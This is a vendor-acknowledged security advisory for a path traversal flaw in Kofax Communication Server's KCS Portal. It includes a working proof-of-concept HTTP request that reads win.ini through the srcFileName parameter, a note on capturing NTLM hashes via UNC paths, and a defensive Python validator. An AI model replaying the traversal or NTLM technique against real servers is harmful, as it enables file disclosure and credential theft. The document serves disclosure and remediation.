usd-2025-66 | Kofax Communication Server 10.5.1 - Path Traversal

Product: Kofax Communication Server
Affected Version: 10.5.1
Vulnerability Type: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') (CWE-22)
Security Risk: Critical
Vendor: Tungsten Automation
Vendor URL: https://www.tungstenautomation.de/
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: Requested
CVE Link: Not requested yet
Advisory ID: usd-2025-66

Description

Kofax Communication Server (KCS), formerly known as TOPCALL, is used as a message broker, mainly for TELEX messages (aerospace-specific messages that, for example, inform about airplane movements). Other message types, such as AFTN, ASCARS, SMS and FAX, are also supported.

The web application KCS Portal allows configuration of allowed recipients and senders, viewing transmitted messages, monitoring functionality, user management, and composing messages.

The web application is vulnerable to path traversal attacks.

When downloading attachments from messages, the source file name as stored on the backend's disk is passed as a parameter in the URL.
The srcFileName parameter is not validated, so an attacker can specify arbitrary files outside the download directory, using directory traversal sequences (../) or absolute paths (C:).

This vulnerability allows an attacker to read from the application's underlying file system.
This makes it possible to retrieve configuration files, passwords or login information, or any other files containing sensitive data.

Proof of Concept

The following request downloads the file C:\Windows\win.ini from the application server:

GET /kcsportal/api/v1/download/[redacted]?Kcs-ConnectionHandle=[...]&srcFileName=./../../../../../../Windows/win.ini&destFileName=test.html HTTP/1.1
Host: [redacted]
Cookie: [redacted]

The server responds with the content of the requested file:

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Disposition: attachment; filename=test.html
[...]
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Furthermore, it is possible to specify UNC paths as the source file name. If an attacker is able to run an SMB server in the adjacent network, it is possible to capture the NTLM hash of the user running the server application.

Fix

It is recommended to filter all input that is used in the context of file operations for path specifications.
Ideally, the file system of the application should be isolated, e.g., using sandboxing.
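
One way to implement the recommended input filtering, as an added example that is not Tungsten Automation's fix or code from this advisory: the requested name is resolved against the download directory and rejected unless the result stays strictly below it. DOWNLOAD_ROOT, resolve_download, is_safe and UnsafePath are hypothetical names, and the sample inputs other than the PoC value are constructed.

```python
import ntpath  # Windows path semantics, usable on any OS (pure string handling)

# Assumed placeholder: the advisory does not name the real attachment directory.
DOWNLOAD_ROOT = r"D:\kcs\attachments"


class UnsafePath(ValueError):
    """Raised when a requested name would resolve outside DOWNLOAD_ROOT."""


def resolve_download(src_file_name: str, root: str = DOWNLOAD_ROOT) -> str:
    """Map an already URL-decoded srcFileName to a path strictly below root."""
    name = src_file_name.replace("/", "\\")
    if not name or "\x00" in name:
        raise UnsafePath("empty name or NUL byte")
    # ':' covers drive letters (C:\, C:foo) and NTFS alternate data streams;
    # a leading backslash covers rooted paths and UNC paths (\\host\share).
    if ":" in name or name.startswith("\\"):
        raise UnsafePath("absolute, drive-qualified or UNC path")
    root_norm = ntpath.normpath(root)
    # normpath collapses '.' and '..' segments before the containment check.
    candidate = ntpath.normpath(ntpath.join(root_norm, name))
    if candidate == root_norm or ntpath.commonpath([root_norm, candidate]) != root_norm:
        raise UnsafePath("resolves outside the download directory")
    return candidate


def is_safe(src_file_name: str) -> bool:
    """Boolean wrapper around resolve_download for logging or tests."""
    try:
        resolve_download(src_file_name)
        return True
    except UnsafePath:
        return False


if __name__ == "__main__":
    # The first value is the srcFileName from the PoC; the rest are constructed.
    for value in ["./../../../../../../Windows/win.ini", r"C:\Windows\win.ini",
                  r"\\198.51.100.7\share\x", "msg-0001/../../secret.cfg",
                  "msg-0001/invoice.pdf"]:
        print(f"{value!r:45} -> {'allow' if is_safe(value) else 'reject'}")
```

This is a string-level check only; it does not follow symbolic links or junctions inside the download directory, so it complements the file system isolation recommended above rather than replacing it.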

Timeline

  • 2025-12-03: Vulnerabilities reported to Tungsten Automation.
  • 2026-01-29: For TCS version 2025.3, the fix FR23775 is released.
  • 2026-03-06: Public disclosure of this vulnerability.

Credits

This security vulnerability was identified by Dominique Dittert, Roman Hergenreder & Samuel Stein of usd AG.